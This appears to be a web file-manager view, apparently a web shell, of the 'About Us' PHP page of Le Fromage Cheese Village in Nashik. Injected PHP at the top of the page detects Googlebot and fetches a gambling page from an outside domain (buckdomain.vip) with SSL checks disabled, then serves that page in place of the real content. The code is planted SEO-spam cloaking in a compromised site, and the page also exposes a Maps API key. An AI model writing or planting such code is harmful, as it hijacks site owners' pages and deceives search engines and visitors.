File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/lefromagecheesevillage.com/about.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/idbet/www.lefromagecheesevillage.com-about.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html class="" lang="en"><!--<![endif]--> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <title> About Us | Le Fromage Cheese Village</title> <!-- Standard Favicon --> <link rel="icon" type="image/x-icon" href="images//favicon.png" /> <!-- For iPhone 4 Retina display: --> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="images//apple-touch-icon-114x114-precomposed.png"> <!-- For iPad: --> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="images//apple-touch-icon-72x72-precomposed.png"> <!-- For iPhone: --> <link rel="apple-touch-icon-precomposed" href="images//apple-touch-icon-57x57-precomposed.png"> <!-- Library - Google Font Familys --> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,300,300italic,400italic,600,600italic,700,700italic,800,800italic' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=Vollkorn:400,400i,700,700i" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="revolution/css/settings.css"> <!-- RS5.0 Layers and Navigation Styles --> <link rel="stylesheet" type="text/css" href="revolution/css/layers.css"> <link rel="stylesheet" type="text/css" href="revolution/css/navigation.css"> <!-- Library - Bootstrap v3.3.5 --> <link rel="stylesheet" type="text/css" href="libraries/lib.css"> <!-- Custom - Common CSS --> <link rel="stylesheet" type="text/css" href="css/plugins.css"> <link rel="stylesheet" type="text/css" href="css/navigation-menu.css"> <!-- Custom - Theme CSS --> <link rel="stylesheet" type="text/css" href="style.css"> <!--[if lt IE 9]> <script src="js/html5/respond.min.js"></script> <![endif]--> </head> <body data-offset="200" data-spy="scroll" data-target=".ow-navigation"> <?php include'include/header.php'?> <main> <!-- Page Banner --> <div class="page-banner about-banner container-fluid no-padding"> <div class="banner-content"> <h3>ABOUT US</h3> <ol class="breadcrumb"> <li><a href="index.php" title="Home">Home</a></li> <li class="active">ABOUT US</li> </ol> </div> </div><!-- Page Banner /- --> <!-- Welcome Section --> <div class="welcome-section container-fluid"> <!-- Container --> <div class="container"> <!-- Section Header --> <div class="section-header section-header-2"> <h3>Welcome To <span> Le Fromage Cheese Village </span> at Nashik</h3> </div><!-- Section Header /- --> <div class="welcome-content"> <p><b>Le Fromage Cheese Village, Nashik – A Divine Blend of Comfort and Tradition</b></p> <p>Welcome to <strong>Le Fromage Cheese Village</strong>, a place where tradition, taste, and craftsmanship come together in perfect harmony. Nestled amidst serene landscapes, our village is dedicated to celebrating the rich art of cheese-making, preserving age-old techniques while embracing modern quality standards. Every cheese we craft is a testament to passion, patience, and authenticity — from the selection of the freshest ingredients to the careful aging process that brings out unique flavors.</p> <p>At Le Fromage Cheese Village, we offer more than just cheese; we offer an experience. Guests can explore the entire journey of cheese-making, from the farm to the table, witnessing the delicate process of transforming fresh milk into delectable, artisanal cheeses. Our village provides a warm, inviting atmosphere where visitors can immerse themselves in hands-on workshops, guided tours, and tasting sessions, discovering the subtle textures, aromas, and tastes that make each cheese a masterpiece.</p> <p>Beyond cheese, our village embodies the spirit of community and sustainability. We work closely with local farmers, ensuring ethical practices, eco-friendly production, and support for regional livelihoods. The picturesque surroundings, rustic charm, and cozy ambiance make it a perfect destination for families, food enthusiasts, and travelers seeking an authentic culinary adventure.</p> <p>Whether you are here to savor our handcrafted cheeses, learn the secrets of traditional cheese-making, or simply enjoy a peaceful retreat amidst nature, <strong>Le Fromage Cheese Village</strong> promises an unforgettable experience filled with flavor, culture, and heart. Come, taste the tradition, and be a part of our story.</p> </div> </div><!-- Container / --> </div><!-- Welcome Section /- --> <!-- Whychooseus Section --> <!-- Facilities Section --> <section class="facilities-section"> <div class="container"> <h2>Our Facilities</h2> <div class="row"> <div class="col-md-2"> <div class="facility-item"> <img src="images/facilities/free-wifi.gif" alt="Free Wi-Fi" width="60" height="60"> <p>Free Wi-Fi</p> </div> </div> <div class="col-md-2"> <div class="facility-item"> <img src="images/facilities/parking.gif" alt="Car Park" width="60" height="60"> <p>Car Park</p> </div> </div> <div class="col-md-2"> <div class="facility-item"> <img src="images/facilities/window.gif" alt="Balcony/Terrace" width="60" height="60"> <p>Balcony/Terrace</p> </div> </div> <div class="col-md-2"> <div class="facility-item"> <img src="images/facilities/dairy-food.gif" alt="Breakfast" width="60" height="60"> <p>Breakfast</p> </div> </div> <div class="col-md-2"> <div class="facility-item"> <img src="images/facilities/room-service.gif" alt="Room Service" width="60" height="60"> <p>Food Delivery</p> </div> </div> <div class="col-md-2"> <div class="facility-item"> <img src="images/facilities/vacuum.gif" alt="Daily Housekeeping" width="60" height="60"> <p> Housekeeping</p> </div> </div> </div> </div> </section> </main> <?php include'include/footer.php'?> <!-- JQuery v1.11.3 --> <script src="js/jquery.min.js"></script> <!-- Library - Js --> <script src="libraries/lib.js"></script><!-- Bootstrap JS File v3.3.5 --> <!-- RS5.0 Core JS Files --> <script type="text/javascript" src="revolution/js/jquery.themepunch.tools.min.js?rev=5.0"></script> <script type="text/javascript" src="revolution/js/jquery.themepunch.revolution.min.js?rev=5.0"></script> <script type="text/javascript" src="revolution/js/extensions/revolution.extension.video.min.js"></script> <script type="text/javascript" src="revolution/js/extensions/revolution.extension.slideanims.min.js"></script> <script type="text/javascript" src="revolution/js/extensions/revolution.extension.layeranimation.min.js"></script> <script type="text/javascript" src="revolution/js/extensions/revolution.extension.navigation.min.js"></script> <!-- Library - Google Map API --> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyDW40y4kdsjsz714OVTvrw7woVCpD8EbLE"></script> <!-- Library - Theme JS --> <script src="js/functions.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings